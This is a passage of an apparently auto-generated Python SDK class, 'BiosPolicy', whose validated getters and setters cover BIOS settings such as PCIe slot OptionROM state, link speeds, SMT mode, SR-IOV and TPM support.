BIOS Token for setting PCIe Slot N5 OptionROM configuration
:return: The slot_n5state of this BiosPolicy.
:rtype: str
"""
return self._slot_n5state
@slot_n5state.setter
def slot_n5state(self, slot_n5state):
"""
Sets the slot_n5state of this BiosPolicy.
BIOS Token for setting PCIe Slot N5 OptionROM configuration
:param slot_n5state: The slot_n5state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n5state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n5state` ({0}), must be one of {1}"
.format(slot_n5state, allowed_values)
)
self._slot_n5state = slot_n5state
@property
def slot_n6state(self):
"""
Gets the slot_n6state of this BiosPolicy.
BIOS Token for setting PCIe Slot N6 OptionROM configuration
:return: The slot_n6state of this BiosPolicy.
:rtype: str
"""
return self._slot_n6state
@slot_n6state.setter
def slot_n6state(self, slot_n6state):
"""
Sets the slot_n6state of this BiosPolicy.
BIOS Token for setting PCIe Slot N6 OptionROM configuration
:param slot_n6state: The slot_n6state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n6state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n6state` ({0}), must be one of {1}"
.format(slot_n6state, allowed_values)
)
self._slot_n6state = slot_n6state
@property
def slot_n7state(self):
"""
Gets the slot_n7state of this BiosPolicy.
BIOS Token for setting PCIe Slot N7 OptionROM configuration
:return: The slot_n7state of this BiosPolicy.
:rtype: str
"""
return self._slot_n7state
@slot_n7state.setter
def slot_n7state(self, slot_n7state):
"""
Sets the slot_n7state of this BiosPolicy.
BIOS Token for setting PCIe Slot N7 OptionROM configuration
:param slot_n7state: The slot_n7state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n7state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n7state` ({0}), must be one of {1}"
.format(slot_n7state, allowed_values)
)
self._slot_n7state = slot_n7state
@property
def slot_n8state(self):
"""
Gets the slot_n8state of this BiosPolicy.
BIOS Token for setting PCIe Slot N8 OptionROM configuration
:return: The slot_n8state of this BiosPolicy.
:rtype: str
"""
return self._slot_n8state
@slot_n8state.setter
def slot_n8state(self, slot_n8state):
"""
Sets the slot_n8state of this BiosPolicy.
BIOS Token for setting PCIe Slot N8 OptionROM configuration
:param slot_n8state: The slot_n8state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n8state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n8state` ({0}), must be one of {1}"
.format(slot_n8state, allowed_values)
)
self._slot_n8state = slot_n8state
@property
def slot_n9state(self):
"""
Gets the slot_n9state of this BiosPolicy.
BIOS Token for setting PCIe Slot N9 OptionROM configuration
:return: The slot_n9state of this BiosPolicy.
:rtype: str
"""
return self._slot_n9state
@slot_n9state.setter
def slot_n9state(self, slot_n9state):
"""
Sets the slot_n9state of this BiosPolicy.
BIOS Token for setting PCIe Slot N9 OptionROM configuration
:param slot_n9state: The slot_n9state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n9state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n9state` ({0}), must be one of {1}"
.format(slot_n9state, allowed_values)
)
self._slot_n9state = slot_n9state
@property
def slot_raid_link_speed(self):
"""
Gets the slot_raid_link_speed of this BiosPolicy.
BIOS Token for setting RAID Link Speed configuration
:return: The slot_raid_link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_raid_link_speed
@slot_raid_link_speed.setter
def slot_raid_link_speed(self, slot_raid_link_speed):
"""
Sets the slot_raid_link_speed of this BiosPolicy.
BIOS Token for setting RAID Link Speed configuration
:param slot_raid_link_speed: The slot_raid_link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_raid_link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_raid_link_speed` ({0}), must be one of {1}"
.format(slot_raid_link_speed, allowed_values)
)
self._slot_raid_link_speed = slot_raid_link_speed
@property
def slot_raid_state(self):
"""
Gets the slot_raid_state of this BiosPolicy.
BIOS Token for setting PCIe Slot RAID OptionROM configuration
:return: The slot_raid_state of this BiosPolicy.
:rtype: str
"""
return self._slot_raid_state
@slot_raid_state.setter
def slot_raid_state(self, slot_raid_state):
"""
Sets the slot_raid_state of this BiosPolicy.
BIOS Token for setting PCIe Slot RAID OptionROM configuration
:param slot_raid_state: The slot_raid_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_raid_state not in allowed_values:
raise ValueError(
"Invalid value for `slot_raid_state` ({0}), must be one of {1}"
.format(slot_raid_state, allowed_values)
)
self._slot_raid_state = slot_raid_state
@property
def slot_rear_nvme1link_speed(self):
"""
Gets the slot_rear_nvme1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear Nvme1 Link Speed configuration
:return: The slot_rear_nvme1link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme1link_speed
@slot_rear_nvme1link_speed.setter
def slot_rear_nvme1link_speed(self, slot_rear_nvme1link_speed):
"""
Sets the slot_rear_nvme1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear Nvme1 Link Speed configuration
:param slot_rear_nvme1link_speed: The slot_rear_nvme1link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_rear_nvme1link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme1link_speed` ({0}), must be one of {1}"
.format(slot_rear_nvme1link_speed, allowed_values)
)
self._slot_rear_nvme1link_speed = slot_rear_nvme1link_speed
@property
def slot_rear_nvme1state(self):
"""
Gets the slot_rear_nvme1state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 1 OptionRom configuration
:return: The slot_rear_nvme1state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme1state
@slot_rear_nvme1state.setter
def slot_rear_nvme1state(self, slot_rear_nvme1state):
"""
Sets the slot_rear_nvme1state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 1 OptionRom configuration
:param slot_rear_nvme1state: The slot_rear_nvme1state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme1state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme1state` ({0}), must be one of {1}"
.format(slot_rear_nvme1state, allowed_values)
)
self._slot_rear_nvme1state = slot_rear_nvme1state
@property
def slot_rear_nvme2link_speed(self):
"""
Gets the slot_rear_nvme2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear Nvme2 Link Speed configuration
:return: The slot_rear_nvme2link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme2link_speed
@slot_rear_nvme2link_speed.setter
def slot_rear_nvme2link_speed(self, slot_rear_nvme2link_speed):
"""
Sets the slot_rear_nvme2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear Nvme2 Link Speed configuration
:param slot_rear_nvme2link_speed: The slot_rear_nvme2link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_rear_nvme2link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme2link_speed` ({0}), must be one of {1}"
.format(slot_rear_nvme2link_speed, allowed_values)
)
self._slot_rear_nvme2link_speed = slot_rear_nvme2link_speed
@property
def slot_rear_nvme2state(self):
"""
Gets the slot_rear_nvme2state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 2 OptionRom configuration
:return: The slot_rear_nvme2state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme2state
@slot_rear_nvme2state.setter
def slot_rear_nvme2state(self, slot_rear_nvme2state):
"""
Sets the slot_rear_nvme2state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 2 OptionRom configuration
:param slot_rear_nvme2state: The slot_rear_nvme2state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme2state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme2state` ({0}), must be one of {1}"
.format(slot_rear_nvme2state, allowed_values)
)
self._slot_rear_nvme2state = slot_rear_nvme2state
@property
def slot_rear_nvme3state(self):
"""
Gets the slot_rear_nvme3state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 3 OptionRom configuration
:return: The slot_rear_nvme3state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme3state
@slot_rear_nvme3state.setter
def slot_rear_nvme3state(self, slot_rear_nvme3state):
"""
Sets the slot_rear_nvme3state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 3 OptionRom configuration
:param slot_rear_nvme3state: The slot_rear_nvme3state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme3state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme3state` ({0}), must be one of {1}"
.format(slot_rear_nvme3state, allowed_values)
)
self._slot_rear_nvme3state = slot_rear_nvme3state
@property
def slot_rear_nvme4state(self):
"""
Gets the slot_rear_nvme4state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 4 OptionRom configuration
:return: The slot_rear_nvme4state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme4state
@slot_rear_nvme4state.setter
def slot_rear_nvme4state(self, slot_rear_nvme4state):
"""
Sets the slot_rear_nvme4state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 4 OptionRom configuration
:param slot_rear_nvme4state: The slot_rear_nvme4state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme4state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme4state` ({0}), must be one of {1}"
.format(slot_rear_nvme4state, allowed_values)
)
self._slot_rear_nvme4state = slot_rear_nvme4state
@property
def slot_rear_nvme5state(self):
"""
Gets the slot_rear_nvme5state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 5 OptionRom configuration
:return: The slot_rear_nvme5state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme5state
@slot_rear_nvme5state.setter
def slot_rear_nvme5state(self, slot_rear_nvme5state):
"""
Sets the slot_rear_nvme5state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 5 OptionRom configuration
:param slot_rear_nvme5state: The slot_rear_nvme5state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme5state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme5state` ({0}), must be one of {1}"
.format(slot_rear_nvme5state, allowed_values)
)
self._slot_rear_nvme5state = slot_rear_nvme5state
@property
def slot_rear_nvme6state(self):
"""
Gets the slot_rear_nvme6state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 6 OptionRom configuration
:return: The slot_rear_nvme6state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme6state
@slot_rear_nvme6state.setter
def slot_rear_nvme6state(self, slot_rear_nvme6state):
"""
Sets the slot_rear_nvme6state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 6 OptionRom configuration
:param slot_rear_nvme6state: The slot_rear_nvme6state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme6state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme6state` ({0}), must be one of {1}"
.format(slot_rear_nvme6state, allowed_values)
)
self._slot_rear_nvme6state = slot_rear_nvme6state
@property
def slot_rear_nvme7state(self):
"""
Gets the slot_rear_nvme7state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 7 OptionRom configuration
:return: The slot_rear_nvme7state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme7state
@slot_rear_nvme7state.setter
def slot_rear_nvme7state(self, slot_rear_nvme7state):
"""
Sets the slot_rear_nvme7state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 7 OptionRom configuration
:param slot_rear_nvme7state: The slot_rear_nvme7state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme7state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme7state` ({0}), must be one of {1}"
.format(slot_rear_nvme7state, allowed_values)
)
self._slot_rear_nvme7state = slot_rear_nvme7state
@property
def slot_rear_nvme8state(self):
"""
Gets the slot_rear_nvme8state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 8 OptionRom configuration
:return: The slot_rear_nvme8state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme8state
@slot_rear_nvme8state.setter
def slot_rear_nvme8state(self, slot_rear_nvme8state):
"""
Sets the slot_rear_nvme8state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 8 OptionRom configuration
:param slot_rear_nvme8state: The slot_rear_nvme8state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme8state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme8state` ({0}), must be one of {1}"
.format(slot_rear_nvme8state, allowed_values)
)
self._slot_rear_nvme8state = slot_rear_nvme8state
@property
def slot_riser1link_speed(self):
"""
Gets the slot_riser1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Link Speed configuration
:return: The slot_riser1link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser1link_speed
@slot_riser1link_speed.setter
def slot_riser1link_speed(self, slot_riser1link_speed):
"""
Sets the slot_riser1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Link Speed configuration
:param slot_riser1link_speed: The slot_riser1link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser1link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser1link_speed` ({0}), must be one of {1}"
.format(slot_riser1link_speed, allowed_values)
)
self._slot_riser1link_speed = slot_riser1link_speed
@property
def slot_riser1slot1link_speed(self):
"""
Gets the slot_riser1slot1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Slot1 Link Speed configuration
:return: The slot_riser1slot1link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser1slot1link_speed
@slot_riser1slot1link_speed.setter
def slot_riser1slot1link_speed(self, slot_riser1slot1link_speed):
"""
Sets the slot_riser1slot1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Slot1 Link Speed configuration
:param slot_riser1slot1link_speed: The slot_riser1slot1link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser1slot1link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser1slot1link_speed` ({0}), must be one of {1}"
.format(slot_riser1slot1link_speed, allowed_values)
)
self._slot_riser1slot1link_speed = slot_riser1slot1link_speed
@property
def slot_riser1slot2link_speed(self):
"""
Gets the slot_riser1slot2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Slot2 Link Speed configuration
:return: The slot_riser1slot2link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser1slot2link_speed
@slot_riser1slot2link_speed.setter
def slot_riser1slot2link_speed(self, slot_riser1slot2link_speed):
"""
Sets the slot_riser1slot2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Slot2 Link Speed configuration
:param slot_riser1slot2link_speed: The slot_riser1slot2link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser1slot2link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser1slot2link_speed` ({0}), must be one of {1}"
.format(slot_riser1slot2link_speed, allowed_values)
)
self._slot_riser1slot2link_speed = slot_riser1slot2link_speed
@property
def slot_riser1slot3link_speed(self):
"""
Gets the slot_riser1slot3link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Slot3 Link Speed configuration
:return: The slot_riser1slot3link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser1slot3link_speed
@slot_riser1slot3link_speed.setter
def slot_riser1slot3link_speed(self, slot_riser1slot3link_speed):
"""
Sets the slot_riser1slot3link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Slot3 Link Speed configuration
:param slot_riser1slot3link_speed: The slot_riser1slot3link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser1slot3link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser1slot3link_speed` ({0}), must be one of {1}"
.format(slot_riser1slot3link_speed, allowed_values)
)
self._slot_riser1slot3link_speed = slot_riser1slot3link_speed
@property
def slot_riser2link_speed(self):
"""
Gets the slot_riser2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Link Speed configuration
:return: The slot_riser2link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser2link_speed
@slot_riser2link_speed.setter
def slot_riser2link_speed(self, slot_riser2link_speed):
"""
Sets the slot_riser2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Link Speed configuration
:param slot_riser2link_speed: The slot_riser2link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser2link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser2link_speed` ({0}), must be one of {1}"
.format(slot_riser2link_speed, allowed_values)
)
self._slot_riser2link_speed = slot_riser2link_speed
@property
def slot_riser2slot4link_speed(self):
"""
Gets the slot_riser2slot4link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Slot4 Link Speed configuration
:return: The slot_riser2slot4link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser2slot4link_speed
@slot_riser2slot4link_speed.setter
def slot_riser2slot4link_speed(self, slot_riser2slot4link_speed):
"""
Sets the slot_riser2slot4link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Slot4 Link Speed configuration
:param slot_riser2slot4link_speed: The slot_riser2slot4link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser2slot4link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser2slot4link_speed` ({0}), must be one of {1}"
.format(slot_riser2slot4link_speed, allowed_values)
)
self._slot_riser2slot4link_speed = slot_riser2slot4link_speed
@property
def slot_riser2slot5link_speed(self):
"""
Gets the slot_riser2slot5link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Slot5 Link Speed configuration
:return: The slot_riser2slot5link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser2slot5link_speed
@slot_riser2slot5link_speed.setter
def slot_riser2slot5link_speed(self, slot_riser2slot5link_speed):
"""
Sets the slot_riser2slot5link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Slot5 Link Speed configuration
:param slot_riser2slot5link_speed: The slot_riser2slot5link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser2slot5link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser2slot5link_speed` ({0}), must be one of {1}"
.format(slot_riser2slot5link_speed, allowed_values)
)
self._slot_riser2slot5link_speed = slot_riser2slot5link_speed
@property
def slot_riser2slot6link_speed(self):
"""
Gets the slot_riser2slot6link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Slot6 Link Speed configuration
:return: The slot_riser2slot6link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser2slot6link_speed
@slot_riser2slot6link_speed.setter
def slot_riser2slot6link_speed(self, slot_riser2slot6link_speed):
"""
Sets the slot_riser2slot6link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Slot6 Link Speed configuration
:param slot_riser2slot6link_speed: The slot_riser2slot6link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser2slot6link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser2slot6link_speed` ({0}), must be one of {1}"
.format(slot_riser2slot6link_speed, allowed_values)
)
self._slot_riser2slot6link_speed = slot_riser2slot6link_speed
@property
def slot_sas_state(self):
"""
Gets the slot_sas_state of this BiosPolicy.
BIOS Token for setting PCIe Slot:SAS OptionROM configuration
:return: The slot_sas_state of this BiosPolicy.
:rtype: str
"""
return self._slot_sas_state
@slot_sas_state.setter
def slot_sas_state(self, slot_sas_state):
"""
Sets the slot_sas_state of this BiosPolicy.
BIOS Token for setting PCIe Slot:SAS OptionROM configuration
:param slot_sas_state: The slot_sas_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot_sas_state not in allowed_values:
raise ValueError(
"Invalid value for `slot_sas_state` ({0}), must be one of {1}"
.format(slot_sas_state, allowed_values)
)
self._slot_sas_state = slot_sas_state
@property
def slot_ssd_slot1link_speed(self):
"""
Gets the slot_ssd_slot1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:FrontPcie1 Link Speed configuration
:return: The slot_ssd_slot1link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_ssd_slot1link_speed
@slot_ssd_slot1link_speed.setter
def slot_ssd_slot1link_speed(self, slot_ssd_slot1link_speed):
"""
Sets the slot_ssd_slot1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:FrontPcie1 Link Speed configuration
:param slot_ssd_slot1link_speed: The slot_ssd_slot1link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_ssd_slot1link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_ssd_slot1link_speed` ({0}), must be one of {1}"
.format(slot_ssd_slot1link_speed, allowed_values)
)
self._slot_ssd_slot1link_speed = slot_ssd_slot1link_speed
@property
def slot_ssd_slot2link_speed(self):
"""
Gets the slot_ssd_slot2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:FrontPcie2 Link Speed configuration
:return: The slot_ssd_slot2link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_ssd_slot2link_speed
@slot_ssd_slot2link_speed.setter
def slot_ssd_slot2link_speed(self, slot_ssd_slot2link_speed):
"""
Sets the slot_ssd_slot2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:FrontPcie2 Link Speed configuration
:param slot_ssd_slot2link_speed: The slot_ssd_slot2link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_ssd_slot2link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_ssd_slot2link_speed` ({0}), must be one of {1}"
.format(slot_ssd_slot2link_speed, allowed_values)
)
self._slot_ssd_slot2link_speed = slot_ssd_slot2link_speed
@property
def smee(self):
"""
Gets the smee of this BiosPolicy.
BIOS Token for setting SMEE configuration
:return: The smee of this BiosPolicy.
:rtype: str
"""
return self._smee
@smee.setter
def smee(self, smee):
"""
Sets the smee of this BiosPolicy.
BIOS Token for setting SMEE configuration
:param smee: The smee of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if smee not in allowed_values:
raise ValueError(
"Invalid value for `smee` ({0}), must be one of {1}"
.format(smee, allowed_values)
)
self._smee = smee
@property
def smt_mode(self):
"""
Gets the smt_mode of this BiosPolicy.
BIOS Token for setting SMT Mode configuration
:return: The smt_mode of this BiosPolicy.
:rtype: str
"""
return self._smt_mode
@smt_mode.setter
def smt_mode(self, smt_mode):
"""
Sets the smt_mode of this BiosPolicy.
BIOS Token for setting SMT Mode configuration
:param smt_mode: The smt_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Off"]
if smt_mode not in allowed_values:
raise ValueError(
"Invalid value for `smt_mode` ({0}), must be one of {1}"
.format(smt_mode, allowed_values)
)
self._smt_mode = smt_mode
@property
def snc(self):
"""
Gets the snc of this BiosPolicy.
BIOS Token for setting Sub Numa Clustering configuration
:return: The snc of this BiosPolicy.
:rtype: str
"""
return self._snc
@snc.setter
def snc(self, snc):
"""
Sets the snc of this BiosPolicy.
BIOS Token for setting Sub Numa Clustering configuration
:param snc: The snc of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled", "enabled"]
if snc not in allowed_values:
raise ValueError(
"Invalid value for `snc` ({0}), must be one of {1}"
.format(snc, allowed_values)
)
self._snc = snc
@property
def sparing_mode(self):
"""
Gets the sparing_mode of this BiosPolicy.
BIOS Token for setting Sparing Mode configuration
:return: The sparing_mode of this BiosPolicy.
:rtype: str
"""
return self._sparing_mode
@sparing_mode.setter
def sparing_mode(self, sparing_mode):
"""
Sets the sparing_mode of this BiosPolicy.
BIOS Token for setting Sparing Mode configuration
:param sparing_mode: The sparing_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "dimm-sparing", "rank-sparing"]
if sparing_mode not in allowed_values:
raise ValueError(
"Invalid value for `sparing_mode` ({0}), must be one of {1}"
.format(sparing_mode, allowed_values)
)
self._sparing_mode = sparing_mode
@property
def sr_iov(self):
"""
Gets the sr_iov of this BiosPolicy.
BIOS Token for setting SR-IOV Support configuration
:return: The sr_iov of this BiosPolicy.
:rtype: str
"""
return self._sr_iov
@sr_iov.setter
def sr_iov(self, sr_iov):
"""
Sets the sr_iov of this BiosPolicy.
BIOS Token for setting SR-IOV Support configuration
:param sr_iov: The sr_iov of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if sr_iov not in allowed_values:
raise ValueError(
"Invalid value for `sr_iov` ({0}), must be one of {1}"
.format(sr_iov, allowed_values)
)
self._sr_iov = sr_iov
@property
def streamer_prefetch(self):
"""
Gets the streamer_prefetch of this BiosPolicy.
BIOS Token for setting DCU Streamer Prefetch configuration
:return: The streamer_prefetch of this BiosPolicy.
:rtype: str
"""
return self._streamer_prefetch
@streamer_prefetch.setter
def streamer_prefetch(self, streamer_prefetch):
"""
Sets the streamer_prefetch of this BiosPolicy.
BIOS Token for setting DCU Streamer Prefetch configuration
:param streamer_prefetch: The streamer_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if streamer_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `streamer_prefetch` ({0}), must be one of {1}"
.format(streamer_prefetch, allowed_values)
)
self._streamer_prefetch = streamer_prefetch
@property
def svm_mode(self):
"""
Gets the svm_mode of this BiosPolicy.
BIOS Token for setting SVM Mode configuration
:return: The svm_mode of this BiosPolicy.
:rtype: str
"""
return self._svm_mode
@svm_mode.setter
def svm_mode(self, svm_mode):
"""
Sets the svm_mode of this BiosPolicy.
BIOS Token for setting SVM Mode configuration
:param svm_mode: The svm_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if svm_mode not in allowed_values:
raise ValueError(
"Invalid value for `svm_mode` ({0}), must be one of {1}"
.format(svm_mode, allowed_values)
)
self._svm_mode = svm_mode
@property
def terminal_type(self):
"""
Gets the terminal_type of this BiosPolicy.
BIOS Token for setting Terminal Type configuration
:return: The terminal_type of this BiosPolicy.
:rtype: str
"""
return self._terminal_type
@terminal_type.setter
def terminal_type(self, terminal_type):
"""
Sets the terminal_type of this BiosPolicy.
BIOS Token for setting Terminal Type configuration
:param terminal_type: The terminal_type of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "pc-ansi", "vt-utf8", "vt100", "vt100-plus"]
if terminal_type not in allowed_values:
raise ValueError(
"Invalid value for `terminal_type` ({0}), must be one of {1}"
.format(terminal_type, allowed_values)
)
self._terminal_type = terminal_type
@property
def tpm_control(self):
"""
Gets the tpm_control of this BiosPolicy.
BIOS Token for setting Trusted Platform Module State configuration
:return: The tpm_control of this BiosPolicy.
:rtype: str
"""
return self._tpm_control
@tpm_control.setter
def tpm_control(self, tpm_control):
"""
Sets the tpm_control of this BiosPolicy.
BIOS Token for setting Trusted Platform Module State configuration
:param tpm_control: The tpm_control of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if tpm_control not in allowed_values:
raise ValueError(
"Invalid value for `tpm_control` ({0}), must be one of {1}"
.format(tpm_control, allowed_values)
)
self._tpm_control = tpm_control
@property
def tpm_support(self):
"""
Gets the tpm_support of this BiosPolicy.
BIOS Token for setting TPM Support configuration
:return: The tpm_support of this BiosPolicy.
:rtype: str
"""
return self._tpm_support
@tpm_support.setter
def tpm_support(self, tpm_support):
"""
Sets the tpm_support of this BiosPolicy.
BIOS Token for setting TPM Support configuration
:param tpm_support: The tpm_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if tpm_support not in allowed_values:
raise ValueError(
"Invalid value for `tpm_support` ({0}), must be one of {1}"
.format(tpm_support, allowed_values)
)
self._tpm_support = tpm_support
@property
def txt_support(self):
"""
Gets the txt_support of this BiosPolicy.
BIOS Token for setting Intel Trusted Execution Technology Support configuration
:return: The txt_support of this BiosPolicy.
:rtype: str
"""
return self._txt_support
@txt_support.setter
def txt_support(self, txt_support):
"""
